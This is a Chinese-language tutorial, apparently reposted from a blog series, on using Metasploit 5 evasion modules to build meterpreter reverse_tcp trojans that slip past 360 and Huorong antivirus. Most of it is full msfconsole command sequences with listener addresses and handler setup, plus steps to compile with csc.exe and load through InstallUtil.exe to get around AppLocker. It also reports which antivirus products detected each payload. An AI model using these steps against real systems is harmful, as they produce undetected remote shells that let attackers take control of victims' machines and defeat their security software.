0x01 免殺能力一覽表

• 1、下表中標識 √ 說明相應殺毒軟件未檢測出病毒，也就是代表了Bypass。
• 2、為了更好的對比效果，大部分測試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。
• 3、由于本機測試時只是安裝了360全家桶和火絨，所以默認情況下360和火絨殺毒情況指的是靜態(tài)+動態(tài)查殺。360殺毒版本5.0.0.8160(2019.12.12)，火絨版本5.0.33.13(2019.12.12)，360安全衛(wèi)士12.0.0.2001(2019.12.17)。
• 4、其他殺軟的檢測指標是在virustotal.com（簡稱VT）上在線查殺，所以可能只是代表了靜態(tài)查殺能力，數據僅供參考，不足以作為免殺的精確判斷指標。

0x02 前言

2019年1月，metasploit升級到了5.0，引入了一個新的模塊叫Evasion模塊，官方宣稱這個模塊可以創(chuàng)建反殺毒軟件的木馬。
evasion有以下幾個模塊,可以使用show evasion進行查看。

0x03 生成載荷

1、生成exe

使用use windows/windows_defender_exe進行生成payload

msf5 > use windows/windows_defender_exe msf5 evasion(windows/windows_defender_exe) > set filename payload.exe msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp msf5 evasion(windows/windows_defender_exe) > set LHOST 10.211.55.3 msf5 evasion(windows/windows_defender_exe) > set LPORT 3333 msf5 evasion(windows/windows_defender_exe) > run

注意要復制產生的exe到另一個位置
不打開殺軟的情況下，可正常上線：

handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp

注意-H和-P，H和P都是大寫

能夠上線

打開殺軟，目前已經無法過360和火絨，看網上資料在該模塊剛出來時是可以過360的。

2、生成hta

用另外一個evasion模塊windows/windows_defender_js_hta生成一下，360同樣被殺

use windows/windows_defender_js_htaset filename payload.htaset lhost 192.168.142.134set lport 5555exploitmv /root/.msf4/local/payload.hta /root/shell/payload.hta

但是火絨靜態(tài)+行為查殺都沒發(fā)現問題，可正常上線

3、生成install_util

evasion還提供了其他幾個模塊，比如windows/applocker_evasion_install_util
創(chuàng)建payload

msf5 > use windows/applocker_evasion_install_util msf5 evasion(windows/applocker_evasion_install_util) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 evasion(windows/applocker_evasion_install_util) > set lhost 10.211.55.2 lhost => 10.211.55.2 msf5 evasion(windows/applocker_evasion_install_util) > set lport 3333 lport => 3333 msf5 evasion(windows/applocker_evasion_install_util) > run[+] install_util.txt stored at /Users/xysoul/.msf4/local/install_util.txt [*] Copy install_util.txt to the target [*] Compile using: C:\Windows\Microsoft.Net\Framework\[.NET Version]\csc.exe /out:install_util.exe install_util.txt [*] Execute using: C:\Windows\Microsoft.Net\Framework\[.NET Version]\InstallUtil.exe /logfile= /LogToConsole=false /U install_util.exe

根據說明，需要使用csc.exe進行編譯一下，然后用InstallUtil.exe加載文件。

csc.exe是微軟.NET Framework 中的C#語言編譯器，本機安裝了.net后就可以找到該文件。我這里用vs2017里的csc.exe進行編譯，生成install_util.exe。

直接執(zhí)行install_util.exe是沒有任何反應的，需要使用InstallUtil.exe /logfile= /LogToConsole=false /U install_util.exe來加載。

注意的是，如果生成的是32位的payload，就要用32位的.net下的InstallUtil來加載，否則文件會無法執(zhí)行。

靜態(tài)查殺都沒有問題，執(zhí)行時360行為查殺會報毒。

0x04 小結

在evasion中共提供了6個免殺模塊，大家都可以進行嘗試。上文中第三個免殺利用csc白名單加載payload的方式還有很多種，網上也有很多介紹，侯亮大神也提到了很多類似的白名單軟件。

而且在2019年1月msf5更新的不止evasion模塊，還有個更強大的模板編譯函數Metasploit::Framework::Compiler，提供了更強大的自定義免殺機制。后面文章會講述該模塊使用。

0x05 參考

applocker_evasion_install_util.md:https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/evasion/windows/applocker_evasion_install_util.md

基于白名單Csc.exe執(zhí)行payload：https://micro8.gitbook.io/micro8/contents-1/71-80/77-ji-yu-bai-ming-dan-csc.exe-zhi-hang-payload-di-qi-ji

總結

以上是生活随笔為你收集整理的远控免杀4---Evasion免杀的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。